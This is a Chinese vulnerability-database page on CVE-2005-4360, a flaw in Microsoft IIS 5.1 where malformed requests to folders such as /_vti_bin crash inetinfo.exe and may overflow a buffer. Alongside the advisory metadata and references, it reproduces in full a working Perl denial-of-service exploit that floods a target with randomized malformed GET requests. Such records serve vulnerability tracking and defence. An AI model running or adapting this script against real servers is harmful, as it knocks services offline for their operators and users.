Microsoft IIS 5.1远程缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109518 漏洞类型 输入验证
发布时间 2005-12-19 更新时间 2007-07-13
CVE编号 CVE-2005-4360 CNNVD-ID CNNVD-200512-423
漏洞平台 Windows CVSS评分 7.8
|漏洞来源
https://www.exploit-db.com/exploits/1377
https://www.securityfocus.com/bid/15921
https://cxsecurity.com/issue/WLB-2005120051
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200512-423
|漏洞详情
MicrosoftIIS是MicrosoftWindows自带的一个网络信息服务器,其中包含HTTP服务功能。MicrosoftIIS处理某些畸形的HTTP请求时存在漏洞,远程攻击者可能利用此漏洞对服务器进行拒绝服务攻击。远程攻击者可以使用WEB浏览器之类的工具发送特制的匿名HTTP请求导致IIS服务进程inetinfo.exe崩溃。仅在文件夹的"执行权限"设置为"脚本和可执行程序"时才会出现这个漏洞。有漏洞的虚拟文件夹包括"/_vti_bin"等。此外如果提交恶意请求还可能会触发缓冲区溢出,导致在用户系统上执行任意代码。
|漏洞EXP
#!/usr/bin/perl
# _really_ bored kokanin / IIS 5.1 dos thing, Inge says to use a browser at 
# http://ingehenriksen.blogspot.com/2005/12/microsoft-iis-remote-dos-dll-url.html
# kokanin not like puny browser!!"#1 I hoped Inge was a leet haxx0r ch1ck, but it's
# apparently a dude, bummer. According to Inge passing a kinda malformed url to
# an executable dir a few times makes inetinfo.exe crap out. Yum, monday. This
# script has insanely elite randomization of the url, it even amazes me.
# Hello ilja, ptp people, others, see you at ccc and stuff.

# sample executable dirs: /_vti_bin/ /_sharepoint/ /scripts/ /cgi-bin/ /msadc/ /iisadmpwd/
# sample malformed url: http://www.example.xom/_vti_bin/.dll/*\~0
# sample run: ./this-crap.pl <www.host.bla> </executable_folder/> <count> 
# count should be 4 according to inge, do more!!!!1one MILLIONS I SAY!!! 

use List::Util 'shuffle';
use IO::Socket::INET;

$target = shift;
$folder = shift;
$amount = shift;

# main iteration thingie
for(1..$amount){
# construct an array of the reportedly bad characters
for(1..31){ @badchars[$_] = chr($_); }
# append the rest of them
@badchars = (@badchars,"?","\"","*",":","<",">");
# shuffle the array so @shuffled[0] is random 
@shuffled = shuffle(@badchars); 
# this is the request
$malformed = $folder . ".dll/" . @shuffled[0] . "/~" . int rand(9);
# this is informative text
print "[$_]\t greeting $target with: " . $malformed . "\n";
# create the socket
$socket = new IO::Socket::INET(
Proto    => "tcp",
PeerAddr => $target,
PeerPort => "80",
);
# error reporting
die "unable to connect to $target ($!) - omgomgwtf itz dead w00t w00t \n" unless $socket;
# the actual data transmission
print $socket "GET " . $malformed . " HTTP/1.0\r\n" . "Host: $target\r\n" . "\r\n\r\n";
# all done
close $socket;
}

# milw0rm.com [2005-12-19]
|受影响的产品
Microsoft IIS 5.1 - Microsoft Windows 2000 Advanced Server SP2 - Microsoft Windows 2000 Advanced Server SP1 - Microsof
|参考资料

来源:US-CERTTechnicalAlert
名称:TA07-191A
链接:http://www.us-cert.gov/cas/techalerts/TA07-191A.html
来源:BID
名称:15921
链接:http://www.securityfocus.com/bid/15921
来源:BUGTRAQ
名称:20051216MicrosoftIISRemoteDenialofService(DoS).DLLUrlexploit
链接:http://www.securityfocus.com/archive/1/archive/1/419707/100/0/threaded
来源:OSVDB
名称:21805
链接:http://www.osvdb.org/21805
来源:MS
名称:MS07-041
链接:http://www.microsoft.com/technet/security/Bulletin/ms07-041.mspx
来源:VUPEN
名称:ADV-2005-2963
链接:http://www.frsirt.com/english/advisories/2005/2963
来源:SECTRACK
名称:1015376
链接:http://securitytracker.com/alerts/2005/Dec/1015376.html
来源:SREASON
名称:271
链接:http://securityreason.com/securityalert/271
来源:SECUNIA
名称:18106
链接:http://secunia.com/advisories/18106
来源:MISC
链接:http://ingehenriksen.blogspot.com/2005/12/microsoft-iis-remote-dos-dll-url.html
来源:HP
名称:SSRT071446
链接:http://archive.cert.uni-stuttgart.de/bugtraq/2007/07/msg00254.html
来源:USGovernmentResource
名称:oval:org.mitre.oval:def:1703
链接:http://oval.mitre.org/repository/data/